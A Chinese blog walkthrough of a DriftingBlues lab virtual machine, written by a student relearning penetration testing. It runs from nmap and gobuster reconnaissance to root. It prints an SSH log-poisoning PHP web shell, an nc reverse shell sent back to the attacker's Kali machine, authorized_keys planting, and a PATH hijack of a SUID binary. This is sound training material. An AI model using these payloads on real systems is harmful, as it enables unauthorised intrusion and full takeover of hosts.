题外话:
本人是苦逼高三生,但是现在已经毕业了,大学学的我心心念念的网络安全,这辈子有了。
本人从初二开始接触网络安全,但是一直是个半吊子,本来想简单做个简单的靶机系列,结果因为学业直接一年没碰,忘得差不多了...反正我在那种知识轰炸中是不能学网安一点的。假期想要学习一下,结果跟同学打游戏直接打到脑溢血(比喻!),最近突然看到一款游戏叫《Hacknet》,想到之前在b站上看yuppt佬玩这游戏(好像?),然后还嘲笑过这游戏把侵入写的这么简单,像是拿着2023年的msf回到2008年,突然醒悟,当时用着运存4gb处理器i5的电脑都要打靶机,我的热爱可不能这样埋藏了!先把之前搞得素材都整理出来,先学会写写博客,同时回忆一下技能。
代码审计应该还有点印象,主要是很多linux基础的命令都忘了,之前初三的时候也经历过,无所谓的,反正也不要求很多的复杂的命令,写shell脚本暂时请教一下gpt吧...
(这是我很在之前打的素材...幸好当时有点装逼癖好,把每个操作都写得很清楚图也截的很全)
我想等我回忆起来之后在b站开直播打靶机
(应该不会说是传播黑客技术吧?试试!)
不多说了,最近的一些博文可能质量不是很高,无法指出所有的痛点,主要是我也不记得了(笑)
里面用到的技术我会好好看看相关手册,如果有更新我会指出的。
一、信息收集
nmap你一定要会!
nmap是一个指纹探测工具,十分好用,但因为nmap发送的包中的浏览器版本是nmap的版本号(这有点蠢,但是很专业!!!你做脚本也要这么做!!!)所以很多机器的流量探测都会对这种包实行管制(就是我们的敌人,防火墙),打靶机当然不需要这么做,但是如果你是在一些比较仿真的机器上,一定要搞个正常浏览器的User-Agent!
你可以在浏览器找到User-Agent
然后里面有类似
User-Agent:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
然后复制下来当作表头用就可以的
nmap -sT -sC -sV -O -A -p22,80 192.168.56.110 -o nmap_details.txt PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6afed61723cb90792bb12d3753974658 (RSA)
| 256 5bc468d18959d748b096f311871c08ac (ECDSA)
|_ 256 613966881d8ff1d040611e99c51a1ff4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry
|_/eventadmins
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:5E:7E:83 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
gobuster dir -u http://192.168.56.110 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php /index.html (Status: 200) [Size: 1373]
/.php (Status: 403) [Size: 279]
/privacy (Status: 301) [Size: 318] [--> http://192.168.56.110/privacy/]
/.html (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 37]
/tickets.html (Status: 200) [Size: 347]
/drupal (Status: 301) [Size: 317] [--> http://192.168.56.110/drupal/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.110/secret/]
/Makefile (Status: 200) [Size: 11]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.110/wp-admin/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.56.110/phpmyadmin/]
gbst它线程很高很快,所以很多进行流量管控的机器就会直接把你的ip ban掉,你要是有钱自然可以搭建一个ip池硬搞,但是也可以放低你的线程,这样就会很慢。你打靶机的时候注意一下,基本是不需要,但是你发现扫不动了掉线了,基本是一下两种情况,一是人家机器做了防火墙的相关设置,一个是你的机器和网络扛不住你这么硬造...
二、Web渗透
看到了暴漏的一些敏感目录,直接下载下来,你可以curl,也可以直接浏览器下载。
http://192.168.56.110/robots.txt:
User-agent: *
Disallow: /eventadmins
http://192.168.56.110/eventadmins/:
man there's a problem with ssh
john said "it's poisonous!!! stay away!!!"
idk if he's mentally challenged
please find and fix it
also check /littlequeenofspades.html
your buddy, buddy
curl -i -L http://192.168.56.110/littlequeenofspades.htmlHTTP/1.1 200 OK
Date: Fri, 28 Jul 2023 05:17:21 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Mon, 04 Jan 2021 11:56:32 GMT
ETag: "522-5b811c7f17c00"
Accept-Ranges: bytes
Content-Length: 1314
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html>
<html>
<body>
<p>Now, she is a little queen of spades, and the men will not let her be </p>
<p>Mmmm, she is the little queen of spades, and the men will not let her be </p>
<p>Everytime she makes a spread, hoo fair brown, cold chill just runs all over me </p>
<p>I'm gon' get me a gamblin' woman, if the last thing that I do </p>
<p>Eee, gon' get me a gamblin' woman, if it's the last thing that I do </p>
<p>Well, a man don't need a woman, ooh fair brown, that he got to give all his money to </p>
<p>Everybody say she got a mojo, now she's been usin' that stuff </p>
<p>Mmmm, mmmm, 'verybody says she got a mojo, 'cause she been usin' that stuff </p>
<p>But she got a way trimmin' down, hoo fair brown, and I mean it's most too tough </p>
<p>Now, little girl, since I am the king, baby, and you is a queen </p>
<p>Ooo eee, since I am the king baby, and you is a queen </p>
<p>Le's us put our heads together, hoo fair brown, then we can make our money green </p>
<p style="color:white">aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==</p>
</html> 发现有一些熟悉的base64code,直接decode就可以!
echo 'aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==' | base64 -d又是一串base64?
intruder? L2FkbWluc2ZpeGl0LnBocA==echo 'L2FkbWluc2ZpeGl0LnBocA==' | base64 -d/adminsfixit.php
curl -i -L http://192.168.56.110/adminsfixit.php <!DOCTYPE html>
<html>
<body>
<p>#######################################################################</p>
<p>ssh auth log</p>
<p>============</p>
<p>i hope some wacky and uncharacteristic thing would not happen</p>
<p>this job is fucking poisonous and im boutta planck length away from quitting this hoe</p>
<p>-abuzer komurcu</p>
<p>#######################################################################</p>
<p> </p>
<p> </p>
</html>
Jul 28 00:04:59 driftingblues sshd[523]: Server listening on 0.0.0.0 port 22.
Jul 28 00:05:02 driftingblues CRON[534]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 28 00:05:02 driftingblues CRON[534]: pam_unix(cron:session): session closed for user root
Jul 28 00:06:01 driftingblues CRON[745]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 28 00:06:01 driftingblues CRON[745]: pam_unix(cron:session): session closed for user root
Jul 28 00:07:01 driftingblues CRON[749]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 28 00:07:01 driftingblues CRON[749]: pam_unix(cron:session): session closed for user root
Jul 28 00:07:14 driftingblues sshd[753]: Did not receive identification string from 192.168.56.102 port 60094
Jul 28 00:07:35 driftingblues sshd[755]: Did not receive identification string from 192.168.56.102 port 39646
Jul 28 00:07:44 driftingblues sshd[756]: Protocol major versions differ for 192.168.56.102 port 45130: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 vs. SSH-1.5-NmapNSE_1.0
Jul 28 00:07:44 driftingblues sshd[757]: Protocol major versions differ for 192.168.56.102 port 45136: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 vs. SSH-1.5-Nmap-SSH1-Hostkey
Jul 28 00:07:44 driftingblues sshd[759]: Unable to negotiate with 192.168.56.102 port 45146: no matching host key type found. Their offer: ssh-dss [preauth]
Jul 28 00:07:44 driftingblues sshd[761]: Connection closed by 192.168.56.102 port 45150 [preauth]
Jul 28 00:07:44 driftingblues sshd[763]: Connection closed by 192.168.56.102 port 45154 [preauth]
Jul 28 00:07:44 driftingblues sshd[765]: Unable to negotiate with 192.168.56.102 port 45162: no matching host key type found. Their offer: ecdsa-sha2-nistp384 [preauth]
Jul 28 00:07:44 driftingblues sshd[767]: Unable to negotiate with 192.168.56.102 port 45166: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth]发现是在读取ssh日志的php脚本
你多次去尝试,你就知道是在变化的!
考虑注入
ssh '<?php system($_GET['cmd']);?>'@192.168.56.110检查是否注入成功
curl -i -L http://192.168.56.110/adminsfixit.php?cmd=lsMakefile
adminsfixit.php
cr.png
drupal
eventadmins
index.html
littlequeenofspades.html
phpmyadmin
privacy
robots.txt
secret
tickets.html
wp-admin注入成功!!!
在浏览器中访问http://192.168.56.110/adminsfixit.php?cmd=nc 192.168.56.102 6666 -e /bin/bash
在kali中nc -lvnp 6666监听
nc -lvnp 6666成功返回shell!
三、提权
cd /homels -liahtotal 16K
129281 drwxr-xr-x 3 robertj robertj 4.0K Jan 4 2021 .
2 drwxr-xr-x 3 root root 4.0K Jan 4 2021 ..
129286 drwx---rwx 2 robertj robertj 4.0K Jul 28 00:40 .ssh
129282 -r-x------ 1 robertj robertj 1.8K Jan 3 2021 user.txt发现有.ssh文件
$cd .ssh
发现文件为空,我们具有写入权限,考虑上传公钥进行ssh横向移动
ssh-keygenGenerating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:ZrHlxLfxQyREdqGeX/9FKVqqVqqkZQAxRCNLmYyhp0Y root@kali
The key's randomart image is:
+---[RSA 3072]----+
|++=* o= +. |
|++o + . . = |
|.E.. . + + . |
|.o . * o * .|
|.. . S . +oo.o|
|. .o .+..+.|
| + oo . o|
| = o. o|
| . .o. .|
+----[SHA256]-----+mv id_rsa.pub authorized_keys python -m http.server 80www-data@driftingblues:/home/robertj/.ssh$ wget http://192.168.56.102/authorized_keysssh robertj@192.168.56.110 -i id_rsaLinux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
robertj@driftingblues:~$ 成功登录~~~~
找一下权限很高的敏感文件
robertj@driftingblues:~$ find / -perm -u=s -type f 2>/dev/null/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/getinfo
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
robertj@driftingblues:~$ getinfo
###################
ip address
###################
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:5e:7e:83 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.110/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 491sec preferred_lft 491sec
inet6 fe80::a00:27ff:fe5e:7e83/64 scope link
valid_lft forever preferred_lft forever
###################
hosts
###################
127.0.0.1 localhost
127.0.1.1 driftingblues
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
###################
os info
###################
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linuxrobertj@driftingblues:~$ ls -liah /usr/bin/getinfo31095 -r-sr-s--- 1 root operators 17K Jan 4 2021 /usr/bin/getinfo
robertj@driftingblues:~$ cat /usr/bin/getinfo
ELF>p@ 9@8
#g v "setuidputssystem__cxa_finalize__libc_start_mainlibc.so.6GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registeCH = F/ DH = /H /H9 tH /H t@ H =i/H 5b/H) H H ?H H H tH .H fD =)/u/UH = .H t % /f 1 I ^H H PTL H
H =
/ - h /] { UH H = H = H = H = H = H = ] f. AWL =,AVI AUI ATA UH -,SL) H H t L L D A H H9 u H []A\A]A^A_ H H ###################
ip address /////////////////////////很重要!!!!!!!!
###################
ip a###################
hosts
###################
cat /etc/hosts###################
os info
###################
uname -a8\ T
l ,zRx
P +zRx
$ @F▒J
l ?▒;*3$"D \ qA C
D| ]B I▒ E E( D0 H8 G@j8A0A(B B▒B 8 P5
4 ▒ 0o
▒@H ▒ o o o o =6FV8@GCC: (Debian 9.3.0-19) 9.3.0
`p4 ! = = = ?@▒0@@@▒
!7@@F =mPy = " = = = @
0 { ▒0@-?▒@@
4FZy▒0@ ▒8@ ] H@p+ @@ Uq ▒@@
"crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.7454__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryt2.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTableputs@@GLIBC_2.2.5_edatasystem@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmain__TMC_END___ITM_registerTMCloneTablesetuid@@GLIBC_2.2.5__cxa_finalize@@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.plt.data.bss.comment # $6 D No
^ o k o z ▒ B ▒ @ pp 44 < = - ? @ 0@0@@@ 0@0`00▒ 6( 8
查其中的字符,可以看出是调用了ip a、cat,uname等命令。
考虑路径劫持
robertj@driftingblues:/tmp$ touch /tmp/ip
robertj@driftingblues:/tmp$ echo '/bin/bash -p' > /tmp/ip
robertj@driftingblues:/tmp$ chmod +x /tmp/ip
robertj@driftingblues:/tmp$ getinfo###################
ip address
###################
root@driftingblues:/tmp# id
uid=0(root) gid=1000(robertj) groups=1000(robertj),1001(operators)
成功提权
root@driftingblues:/root# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
ok!这个靶机就已经拿下了!
扫一扫
2840
到【灌水乐园】发言
